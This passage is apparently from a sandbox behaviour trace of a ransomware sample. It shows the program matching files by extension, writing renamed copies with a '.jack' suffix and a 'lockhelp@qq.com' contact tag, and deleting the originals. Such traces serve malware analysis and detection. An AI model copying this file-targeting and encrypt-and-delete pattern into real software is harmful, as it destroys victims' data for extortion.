(lpString1=".pdf", lpString2=".WMF") returned -1 [0219.803] lstrlenW (lpString=".xls") returned 4 [0219.803] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0219.803] lstrlenW (lpString=".xlsx") returned 5 [0219.803] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0219.803] lstrlenW (lpString=".ppt") returned 4 [0219.803] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0219.803] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00790_.WMF") returned 68 [0219.803] lstrlenW (lpString=".zip") returned 4 [0219.803] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0219.803] lstrlenW (lpString=".rar") returned 4 [0219.803] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0219.803] lstrlenW (lpString=".bz2") returned 4 [0219.803] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0219.803] lstrlenW (lpString=".7z") returned 3 [0219.803] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0219.804] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00790_.WMF") returned 68 [0219.804] lstrlenW (lpString=".dbf") returned 4 [0219.804] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0219.804] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00790_.WMF") returned 68 [0219.804] lstrlenW (lpString=".1cd") returned 4 [0219.804] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0219.804] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00790_.WMF") returned 68 [0219.804] lstrlenW (lpString=".jpg") returned 4 [0219.804] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0219.804] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00790_.WMF") returned 68 [0219.804] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00790_.WMF") returned 68 [0219.804] lstrlenW (lpString=".doc") returned 4 [0219.804] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0219.804] lstrlenW (lpString=".docx") returned 5 [0219.804] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0219.804] lstrlenW (lpString=".pdf") returned 4 [0219.804] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0219.804] lstrlenW (lpString=".xls") returned 4 [0219.804] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0219.804] lstrlenW (lpString=".xlsx") returned 5 [0219.804] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0219.804] lstrlenW (lpString=".ppt") returned 4 [0219.804] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0219.804] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00790_.WMF") returned 68 [0219.804] lstrlenW (lpString=".zip") returned 4 [0219.804] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0219.804] lstrlenW (lpString=".rar") returned 4 [0219.804] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0219.804] lstrlenW (lpString=".bz2") returned 4 [0219.804] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0219.804] lstrlenW (lpString=".7z") returned 3 [0219.804] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0219.805] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00790_.WMF") returned 68 [0219.805] lstrlenW (lpString=".dbf") returned 4 [0219.805] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0219.805] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00790_.WMF") returned 68 [0219.805] lstrlenW (lpString=".1cd") returned 4 [0219.805] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0219.805] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00790_.WMF") returned 68 [0219.805] lstrlenW (lpString=".jpg") returned 4 [0219.805] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0219.805] lstrcmpiW (lpString1=".WMF", lpString2=".jack") returned 1 [0219.805] lstrlenW (lpString="AN00932_.WMF") returned 12 [0219.805] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00932_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00932_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x424 [0219.805] GetFileSizeEx (in: hFile=0x424, lpFileSize=0x3a5ff14 | out: lpFileSize=0x3a5ff14*=14428) returned 1 [0219.805] CloseHandle (hObject=0x424) returned 1 [0219.805] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00932_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00932_.wmf")) returned 0x220 [0219.806] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00932_.WMF.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00932_.wmf.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0219.806] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00932_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00932_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x424 [0219.806] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0219.806] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0219.806] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00932_.WMF.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00932_.wmf.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc [0219.806] GetLastError () returned 0x0 [0219.806] ReadFile (hFile=0x424, lpBuffer=0x4555020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fecc, lpOverlapped=0x0) Thread: id = 24 os_tid = 0xa6c [0195.761] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10000) returned 0x3fe1270 [0195.762] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10000) returned 0x3ff1278 [0195.763] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x2378830 [0195.763] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x6) returned 0x65aa50 [0195.763] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x2378b60 [0195.763] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x100000) returned 0x466a020 [0195.766] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x2378d28 [0195.766] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x2378d28, Size=0x20) returned 0x236baf8 [0195.766] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x2378d28 [0195.766] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x2378d28, Size=0x20) returned 0x236b8f0 [0195.766] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75e90000 [0195.766] GetProcAddress (hModule=0x75e90000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x75ea6b30 [0195.766] Wow64DisableWow64FsRedirection (in: OldValue=0x3b9ff50 | out: OldValue=0x3b9ff50*=0x0) returned 1 [0195.766] lstrlenW (lpString="kernel32.dll") returned 12 [0195.766] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x236baf8 | out: hHeap=0x5e0000) returned 1 [0195.767] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0195.767] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x236b8f0 | out: hHeap=0x5e0000) returned 1 [0195.767] Sleep (dwMilliseconds=0x64) [0195.939] lstrcmpiW (lpString1=".ini", lpString2=".jack") returned -1 [0195.939] lstrlenW (lpString="GetCurrentRollback.ini") returned 22 [0195.939] CreateFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini" (normalized: "c:\\$getcurrent\\safeos\\getcurrentrollback.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ec [0196.558] GetFileSizeEx (in: hFile=0x3ec, lpFileSize=0x3b9ff14 | out: lpFileSize=0x3b9ff14*=156) returned 1 [0196.558] CloseHandle (hObject=0x3ec) returned 1 [0196.559] GetFileAttributesW (lpFileName="C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini" (normalized: "c:\\$getcurrent\\safeos\\getcurrentrollback.ini")) returned 0x20 [0196.559] GetFileAttributesW (lpFileName="C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\$getcurrent\\safeos\\getcurrentrollback.ini.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0196.559] CreateFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini" (normalized: "c:\\$getcurrent\\safeos\\getcurrentrollback.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ec [0196.560] SetFilePointerEx (in: hFile=0x3ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.560] SetFilePointerEx (in: hFile=0x3ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.560] CreateFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\$getcurrent\\safeos\\getcurrentrollback.ini.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e4 [0196.573] GetLastError () returned 0x0 [0196.573] ReadFile (in: hFile=0x3ec, lpBuffer=0x466a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b9fecc, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesRead=0x3b9fecc*=0x9c, lpOverlapped=0x0) returned 1 [0196.585] WriteFile (in: hFile=0x3e4, lpBuffer=0x466a020*, nNumberOfBytesToWrite=0xa0, lpNumberOfBytesWritten=0x3b9fc94, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesWritten=0x3b9fc94*=0xa0, lpOverlapped=0x0) returned 1 [0196.592] ReadFile (in: hFile=0x3ec, lpBuffer=0x466a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b9fecc, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesRead=0x3b9fecc*=0x0, lpOverlapped=0x0) returned 1 [0196.592] WriteFile (in: hFile=0x3e4, lpBuffer=0x466a020*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3b9fc94, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesWritten=0x3b9fc94*=0x100, lpOverlapped=0x0) returned 1 [0196.592] SetEndOfFile (hFile=0x3e4) returned 1 [0196.593] CloseHandle (hObject=0x3e4) returned 1 [0196.597] SetFilePointerEx (in: hFile=0x3ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.597] SetEndOfFile (hFile=0x3ec) returned 1 [0196.598] CloseHandle (hObject=0x3ec) returned 1 [0196.598] SetFileAttributesW (lpFileName="C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x20) returned 1 [0196.599] DeleteFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini" (normalized: "c:\\$getcurrent\\safeos\\getcurrentrollback.ini")) returned 1 [0196.599] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini") returned 44 [0196.599] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini") returned 44 [0196.599] lstrlenW (lpString=".doc") returned 4 [0196.599] lstrcmpiW (lpString1=".doc", lpString2=".ini") returned -1 [0196.599] lstrlenW (lpString=".docx") returned 5 [0196.599] lstrcmpiW (lpString1=".docx", lpString2="k.ini") returned -1 [0196.600] lstrlenW (lpString=".pdf") returned 4 [0196.600] lstrcmpiW (lpString1=".pdf", lpString2=".ini") returned 1 [0196.600] lstrlenW (lpString=".xls") returned 4 [0196.600] lstrcmpiW (lpString1=".xls", lpString2=".ini") returned 1 [0196.600] lstrlenW (lpString=".xlsx") returned 5 [0196.600] lstrcmpiW (lpString1=".xlsx", lpString2="k.ini") returned -1 [0196.600] lstrlenW (lpString=".ppt") returned 4 [0196.600] lstrcmpiW (lpString1=".ppt", lpString2=".ini") returned 1 [0196.600] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini") returned 44 [0196.600] lstrlenW (lpString=".zip") returned 4 [0196.600] lstrcmpiW (lpString1=".zip", lpString2=".ini") returned 1 [0196.600] lstrlenW (lpString=".rar") returned 4 [0196.600] lstrcmpiW (lpString1=".rar", lpString2=".ini") returned 1 [0196.600] lstrlenW (lpString=".bz2") returned 4 [0196.600] lstrcmpiW (lpString1=".bz2", lpString2=".ini") returned -1 [0196.600] lstrlenW (lpString=".7z") returned 3 [0196.601] lstrcmpiW (lpString1=".7z", lpString2="ini") returned -1 [0196.601] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini") returned 44 [0196.601] lstrlenW (lpString=".dbf") returned 4 [0196.601] lstrcmpiW (lpString1=".dbf", lpString2=".ini") returned -1 [0196.601] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini") returned 44 [0196.601] lstrlenW (lpString=".1cd") returned 4 [0196.601] lstrcmpiW (lpString1=".1cd", lpString2=".ini") returned -1 [0196.601] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini") returned 44 [0196.601] lstrlenW (lpString=".jpg") returned 4 [0196.601] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0196.601] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini") returned 44 [0196.601] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini") returned 44 [0196.601] lstrlenW (lpString=".doc") returned 4 [0196.601] lstrcmpiW (lpString1=".doc", lpString2=".ini") returned -1 [0196.601] lstrlenW (lpString=".docx") returned 5 [0196.601] lstrcmpiW (lpString1=".docx", lpString2="k.ini") returned -1 [0196.602] lstrlenW (lpString=".pdf") returned 4 [0196.602] lstrcmpiW (lpString1=".pdf", lpString2=".ini") returned 1 [0196.602] lstrlenW (lpString=".xls") returned 4 [0196.602] lstrcmpiW (lpString1=".xls", lpString2=".ini") returned 1 [0196.602] lstrlenW (lpString=".xlsx") returned 5 [0196.602] lstrcmpiW (lpString1=".xlsx", lpString2="k.ini") returned -1 [0196.602] lstrlenW (lpString=".ppt") returned 4 [0196.602] lstrcmpiW (lpString1=".ppt", lpString2=".ini") returned 1 [0196.602] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini") returned 44 [0196.602] lstrlenW (lpString=".zip") returned 4 [0196.602] lstrcmpiW (lpString1=".zip", lpString2=".ini") returned 1 [0196.602] lstrlenW (lpString=".rar") returned 4 [0196.602] lstrcmpiW (lpString1=".rar", lpString2=".ini") returned 1 [0196.602] lstrlenW (lpString=".bz2") returned 4 [0196.602] lstrcmpiW (lpString1=".bz2", lpString2=".ini") returned -1 [0196.602] lstrlenW (lpString=".7z") returned 3 [0196.602] lstrcmpiW (lpString1=".7z", lpString2="ini") returned -1 [0196.603] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini") returned 44 [0196.603] lstrlenW (lpString=".dbf") returned 4 [0196.603] lstrcmpiW (lpString1=".dbf", lpString2=".ini") returned -1 [0196.603] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini") returned 44 [0196.603] lstrlenW (lpString=".1cd") returned 4 [0196.603] lstrcmpiW (lpString1=".1cd", lpString2=".ini") returned -1 [0196.603] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini") returned 44 [0196.603] lstrlenW (lpString=".jpg") returned 4 [0196.603] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0196.603] lstrcmpiW (lpString1=".xml", lpString2=".jack") returned 1 [0196.603] lstrlenW (lpString="LocalizedData.xml") returned 17 [0196.603] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1029\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1029\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ec [0196.714] GetFileSizeEx (in: hFile=0x3ec, lpFileSize=0x3b9ff14 | out: lpFileSize=0x3b9ff14*=80970) returned 1 [0196.714] CloseHandle (hObject=0x3ec) returned 1 [0196.714] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1029\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1029\\localizeddata.xml")) returned 0x80 [0196.714] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1029\\LocalizedData.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1029\\localizeddata.xml.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0196.714] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1029\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1029\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ec [0196.715] SetFilePointerEx (in: hFile=0x3ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.715] SetFilePointerEx (in: hFile=0x3ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.715] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1029\\LocalizedData.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1029\\localizeddata.xml.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e4 [0196.715] GetLastError () returned 0x0 [0196.715] ReadFile (in: hFile=0x3ec, lpBuffer=0x466a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b9fecc, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesRead=0x3b9fecc*=0x13c4a, lpOverlapped=0x0) returned 1 [0196.718] WriteFile (in: hFile=0x3e4, lpBuffer=0x466a020*, nNumberOfBytesToWrite=0x13c50, lpNumberOfBytesWritten=0x3b9fc94, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesWritten=0x3b9fc94*=0x13c50, lpOverlapped=0x0) returned 1 [0196.720] ReadFile (in: hFile=0x3ec, lpBuffer=0x466a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b9fecc, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesRead=0x3b9fecc*=0x0, lpOverlapped=0x0) returned 1 [0196.720] WriteFile (in: hFile=0x3e4, lpBuffer=0x466a020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0x3b9fc94, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesWritten=0x3b9fc94*=0xf6, lpOverlapped=0x0) returned 1 [0196.720] SetEndOfFile (hFile=0x3e4) returned 1 [0196.721] CloseHandle (hObject=0x3e4) returned 1 [0196.727] SetFilePointerEx (in: hFile=0x3ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.727] SetEndOfFile (hFile=0x3ec) returned 1 [0196.729] CloseHandle (hObject=0x3ec) returned 1 [0196.729] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1029\\LocalizedData.xml.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0196.729] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1029\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1029\\localizeddata.xml")) returned 1 [0196.730] lstrlenW (lpString="C:\\588bce7c90097ed212\\1029\\LocalizedData.xml") returned 44 [0196.730] lstrlenW (lpString="C:\\588bce7c90097ed212\\1029\\LocalizedData.xml") returned 44 [0196.730] lstrlenW (lpString=".doc") returned 4 [0196.730] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0196.730] lstrlenW (lpString=".docx") returned 5 [0196.730] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0196.730] lstrlenW (lpString=".pdf") returned 4 [0196.730] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0196.730] lstrlenW (lpString=".xls") returned 4 [0196.730] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0196.730] lstrlenW (lpString=".xlsx") returned 5 [0196.730] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0196.730] lstrlenW (lpString=".ppt") returned 4 [0196.730] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0196.730] lstrlenW (lpString="C:\\588bce7c90097ed212\\1029\\LocalizedData.xml") returned 44 [0196.730] lstrlenW (lpString=".zip") returned 4 [0196.730] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0196.730] lstrlenW (lpString=".rar") returned 4 [0196.730] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0196.730] lstrlenW (lpString=".bz2") returned 4 [0196.730] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0196.730] lstrlenW (lpString=".7z") returned 3 [0196.730] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0196.730] lstrlenW (lpString="C:\\588bce7c90097ed212\\1029\\LocalizedData.xml") returned 44 [0196.730] lstrlenW (lpString=".dbf") returned 4 [0196.731] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0196.731] lstrlenW (lpString="C:\\588bce7c90097ed212\\1029\\LocalizedData.xml") returned 44 [0196.731] lstrlenW (lpString=".1cd") returned 4 [0196.731] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0196.731] lstrlenW (lpString="C:\\588bce7c90097ed212\\1029\\LocalizedData.xml") returned 44 [0196.731] lstrlenW (lpString=".jpg") returned 4 [0196.731] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0196.731] lstrlenW (lpString="C:\\588bce7c90097ed212\\1029\\LocalizedData.xml") returned 44 [0196.731] lstrlenW (lpString="C:\\588bce7c90097ed212\\1029\\LocalizedData.xml") returned 44 [0196.731] lstrlenW (lpString=".doc") returned 4 [0196.731] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0196.731] lstrlenW (lpString=".docx") returned 5 [0196.731] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0196.731] lstrlenW (lpString=".pdf") returned 4 [0196.731] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0196.731] lstrlenW (lpString=".xls") returned 4 [0196.731] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0196.731] lstrlenW (lpString=".xlsx") returned 5 [0196.731] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0196.731] lstrlenW (lpString=".ppt") returned 4 [0196.731] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0196.731] lstrlenW (lpString="C:\\588bce7c90097ed212\\1029\\LocalizedData.xml") returned 44 [0196.731] lstrlenW (lpString=".zip") returned 4 [0196.731] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0196.731] lstrlenW (lpString=".rar") returned 4 [0196.732] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0196.732] lstrlenW (lpString=".bz2") returned 4 [0196.732] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0196.732] lstrlenW (lpString=".7z") returned 3 [0196.732] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0196.732] lstrlenW (lpString="C:\\588bce7c90097ed212\\1029\\LocalizedData.xml") returned 44 [0196.732] lstrlenW (lpString=".dbf") returned 4 [0196.732] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0196.732] lstrlenW (lpString="C:\\588bce7c90097ed212\\1029\\LocalizedData.xml") returned 44 [0196.732] lstrlenW (lpString=".1cd") returned 4 [0196.732] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0196.732] lstrlenW (lpString="C:\\588bce7c90097ed212\\1029\\LocalizedData.xml") returned 44 [0196.732] lstrlenW (lpString=".jpg") returned 4 [0196.732] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0196.732] lstrcmpiW (lpString1=".rtf", lpString2=".jack") returned 1 [0196.732] lstrlenW (lpString="eula.rtf") returned 8 [0196.732] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1031\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1031\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ec [0196.733] GetFileSizeEx (in: hFile=0x3ec, lpFileSize=0x3b9ff14 | out: lpFileSize=0x3b9ff14*=3419) returned 1 [0196.733] CloseHandle (hObject=0x3ec) returned 1 [0196.733] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1031\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1031\\eula.rtf")) returned 0x80 [0196.733] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1031\\eula.rtf.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1031\\eula.rtf.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0196.733] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1031\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1031\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ec [0196.733] SetFilePointerEx (in: hFile=0x3ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.734] SetFilePointerEx (in: hFile=0x3ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.734] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1031\\eula.rtf.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1031\\eula.rtf.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e4 [0196.734] GetLastError () returned 0x0 [0196.734] ReadFile (in: hFile=0x3ec, lpBuffer=0x466a020, nNumberOfBytesToRead=0xffff0, 